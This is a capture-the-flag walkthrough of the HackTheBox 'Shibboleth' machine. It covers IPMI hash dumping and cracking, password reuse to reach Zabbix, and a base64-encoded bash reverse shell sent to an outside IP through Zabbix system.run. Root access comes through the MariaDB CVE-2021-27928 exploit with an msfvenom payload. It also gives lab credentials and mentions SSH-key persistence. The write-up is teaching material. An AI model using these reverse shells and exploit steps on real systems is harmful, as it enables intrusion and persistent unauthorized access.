Shibboleth
Enumeration
Nmap
First, let's scan for open ports using nmap. We can quickly scan for open ports and store them in a variable: ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.124 | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running nmap's built-in scripts: nmap -p$ports -sC -sV 10.10.11.124.
It looks like there is an Apache webserver running on port 80. Attempting to visit the website redirects us to http://shibboleth.htb, so let's add that to /etc/hosts: echo "10.10.11.124 shibboleth.htb" | sudo tee -a /etc/hosts.
Scan for UDP services with sudo nmap -p- -sU -r -T5 10.10.11.124 -v (-r specifies that ports will be scanned sequentially instead of randomly. we do this because services are more likely to be running on ports 1-1000.):
So, port 623/udp is open.
Apache (Port 80)
80)This website says the following at the bottom in the footer: "Powered by enterprise monitoring solutions based on Zabbix & Bare Metal BMC automation." The rest appears to be a generic template.
Virtual Host Scanning
Let's can for virtual hosts (subdomains) with ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://shibboleth.htb/ -H "Host: FUZZ.shibboleth.htb" -fc 302:
Let's add these subdomains to /etc/hosts: echo "10.10.11.124 monitor.shibboleth.htb\n10.10.11.124 monitoring.shibboleth.htb\n10.10.11.124 zabbix.shibboleth.htb" | sudo tee -a /etc/hosts.
Zabbix (zabbix Virtual Host) Part 1
zabbix Virtual Host) Part 1asf-rmcp (Port 623/udp)
623/udp)Let's scan port 623/udp individually with nmap by running sudo nmap -p623 -sU -T5 -sC -sV 10.10.11.124:
According to HackTricks, we can get the version of IPMI using the auxiliary/scanner/ipmi/ipmi_version metasploit module:
The module returns the following:
So, it looks like IPMI 2.0 is being used.
According to HackTricks, we can identify this issue with the auxiliary/scanner/ipmi/ipmi_cipher_zero metasploit module:
The module returns the following:
So, it looks like this service is vulnerable to this exploit.
According to HackTricks: "Basically, you can ask the server for the hashes MD5 and SHA1 of any username and if the username exists those hashes will be sent back. Yeah, as amazing as it sounds." This can be accomplished using the metasploit module auxiliary/scanner/ipmi/ipmi_dumphashes. Metasploit has a default list of usernames (the list has 7 items) to try so we will just use that.
This produces the following output:
In our ./ipmi_hashes file we now have the following:
We need to remove the ip address, the space after it, and the username so that hashcat will interpret this file correctly (even though metasploit said it would export this in hashcat format).
Now, let's crack this with hashcat: hashcat -a 0 -m 7300 ./ipmi_hashes /usr/share/wordlists/rockyou.txt. This gives us the password: ilovepumkinpie1 for the user Administrator. hashcat will autodetect the hash as type 7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocol sometimes. So, we specify it in the command to have the best odds of it working.
Foothold
Let's see if we have password reuse on Zabbix with the credentials Administrator:ilovepumkinpie1. We are able to sign in!
Put in any name and then for the key use the syntax: system.run["whoami"]. We use a bash reverse shell: echo -n "bash -i >& /dev/tcp/10.10.14.37/26225 0>&1" | base64. We base64 encode it just to remove any illegal characters: system.run["echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNy8yNjIyNSAwPiYx' | base64 -d | bash"]. Paste in this payload, click "Test" at the bottom, then click "Get value and test" to get a reverse shell.
It looks like the ipmi-svc user's home directory has the user.txt flag (see ls -la /home/ipmi-svc/) so we are going to have to do some lateral movement.
Lateral Movement
We can upload LinPEAS with pwncat by running upload linpeas.sh /tmp/linpeas.sh in the local shell. Then, run LinPEAS with bash /tmp/linpeas.sh. After looking around in this output for a while and wasting a lot of time, we tried just switching to the ipmi-svc user with su ipmi-svc and reusing the same password that we know ilovepumkinpie1. This works!
Privilege Escalation
We can now cat user.txt to get the user.txt flag.
Now that we have access to this user, let's try running LinPEAS with bash /tmp/linpeas.sh.
We see that the file /etc/zabbix/zabbix_server.conf has a username and password for a database:
Let's try connecting to mysql running on port 3306 with the credentials zabbix:bloooarskybluh. The database name is also zabbix, as shown in the zabbix_server.conf file.
MariaDB
Connect to mysql with mysql -D zabbix -u zabbix -p and then enter the password bloooarskybluh.
The version string for the instance of MariaDB that is running is 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04. We can use searchsploit mariadb 10 to see if there are any exploits:
We can look at the first exploit with cat /usr/share/exploitdb/exploits/linux/local/49765.txt:
We can see that mysql is running as root with ps -au root and pgrep -u root mysql, so getting command execution using this vulnerability will let us run commands as root.
Using the Exploit
Let's follow the steps proved by the exploit-db file. First, we create the reverse shell payload with msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=14781 -f elf-so -o CVE-2021-27928.so. Then, we start listening with nc -lnvp 14781. We use pwncat to upload the exploit to the target with upload CVE-2021-27928.so /tmp/CVE-2021-27928.so. Then, we run the payload with mysql -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";' and enter the password bloooarskybluh.
Sure enough, we get a root shell with our nc listener. We can now run cat /root/root.txt to get the root.txt flag.
We could now establish persistance by uploading our ssh public key to /root/.ssh/authorized_key and then started the sshd service if we wanted.
Last updated
Was this helpful?